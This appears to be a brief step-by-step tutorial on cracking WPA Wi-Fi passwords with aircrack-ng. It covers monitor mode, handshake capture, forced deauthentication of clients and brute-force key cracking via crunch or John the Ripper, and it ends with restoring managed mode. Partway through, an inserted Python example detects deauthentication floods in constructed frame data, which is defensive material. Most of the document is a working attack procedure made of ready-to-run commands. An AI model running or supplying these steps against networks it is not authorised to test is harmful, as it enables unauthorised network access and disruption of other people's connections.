--Educational purpose only--
1. airmon-ng start wlan0
After this, a few interfering processes need to be killed so the card can enter monitor mode; the Wi-Fi icon disappears.
2. airodump-ng wlan0 (the interface may have another name, e.g. wlan0mon)
3. airodump-ng -c 11 -w WPA110 --bssid 80:89:17:41:DD:E0 wlan0
This step should be left running.
4. aireplay-ng -0 1 -a <bssid> -c <client station>
After repeating step 4 a few times you should see "WPA handshake" in the step 3 window; then stop both 3 and 4.
Example with the options explained:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
- -0 means deauthentication
- 1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously
- -a 00:14:6C:7E:40:80 is the MAC address of the access point
- -c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated
- ath0 is the interface name
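The burst in step 4 is also exactly what a wireless IDS flags: many deauthentication frames carrying the AP's address within a short window. The block below is an added example (not from these notes or the aircrack-ng project) of that detection logic run over constructed frame records; the window and threshold values are assumptions, and on networks with 802.11w (Protected Management Frames) enabled clients discard such unauthenticated deauth frames anyway.

```python
from collections import defaultdict, deque

DEAUTH = (0, 12)        # 802.11 management frame (type 0), subtype 12 = deauthentication
WINDOW_SECONDS = 5.0    # sliding window length (assumed value)
THRESHOLD = 5           # deauth frames from one transmitter within the window => alert (assumed)

# Constructed sample, not a real capture: (timestamp, type, subtype, transmitter, receiver).
# The AP and client MACs are the ones used in the notes above; AA:BB:CC:DD:EE:01 is made up.
SAMPLE_FRAMES = [
    (0.0, 2, 0, "00:14:6C:7E:40:80", "00:0F:B5:34:30:30"),   # ordinary data frame
    (0.5, 0, 8, "00:14:6C:7E:40:80", "FF:FF:FF:FF:FF:FF"),   # beacon
    (1.0, 0, 12, "AA:BB:CC:DD:EE:01", "00:0F:B5:34:30:3A"),  # one deauth: normal AP housekeeping
    (2.0, 0, 12, "00:14:6C:7E:40:80", "00:0F:B5:34:30:30"),  # burst like step 4 begins
    (2.1, 0, 12, "00:14:6C:7E:40:80", "00:0F:B5:34:30:30"),
    (2.2, 0, 12, "00:14:6C:7E:40:80", "00:0F:B5:34:30:30"),
    (2.3, 0, 12, "00:14:6C:7E:40:80", "00:0F:B5:34:30:30"),
    (2.4, 0, 12, "00:14:6C:7E:40:80", "00:0F:B5:34:30:30"),  # fifth within 0.4 s
    (9.9, 0, 12, "00:14:6C:7E:40:80", "00:0F:B5:34:30:30"),  # isolated, outside the window
]


def detect_deauth_floods(frames, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return {transmitter: timestamp of first alert} for every transmitter
    address that sends `threshold` or more deauthentication frames within
    any `window`-second span. Non-deauth frames are ignored."""
    recent = defaultdict(deque)   # transmitter -> timestamps of its recent deauths
    alerts = {}
    for ts, ftype, subtype, tx, _rx in sorted(frames, key=lambda f: f[0]):
        if (ftype, subtype) != DEAUTH:
            continue
        q = recent[tx]
        q.append(ts)
        while q and ts - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and tx not in alerts:
            alerts[tx] = ts
    return alerts


if __name__ == "__main__":
    for bssid, ts in detect_deauth_floods(SAMPLE_FRAMES).items():
        print(f"deauth flood from {bssid} at t={ts}s")
```

A single deauth (as the AP itself sends when dropping an idle client) stays below the threshold, so only the burst raises an alert.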
5. crunch 8 8 abcd | aircrack-ng YY_crack-01.cap -b <bssid> -w -
(crunch arguments: 8 is the minimum length, 8 the maximum length, abcd the character set to combine; `-w -` makes aircrack-ng read the wordlist from stdin)
Better to pipe through John the Ripper instead; otherwise the run cannot be paused and resumed:
john --session=foo --stdout --wordlist=wordlist.dic | aircrack-ng -w - -b 00:11:22:33:44:55 WPAcrack.cap
| Option | Description |
|---|---|
| --session | The name of the session |
| --wordlist | The name of the dictionary file |
| -b | The MAC address of the access point |
| WPAcrack.cap | The name of the file that contains the authentication handshake |
Press q or Ctrl-C to pause, then
john --restore=foo | aircrack-ng -w - -b 00:11:22:33:44:55 WPAcrack.cap
Credits: https://www.shellhacks.com/pause-resume-aircrack-ng/
Now we need to put the card back into managed mode so Wi-Fi can reconnect:
1. ifconfig wlan0 down
2. iwconfig wlan0 mode managed
3. ifconfig wlan0 up
4. /etc/init.d/networking restart
5. /etc/init.d/network-manager restart
Done!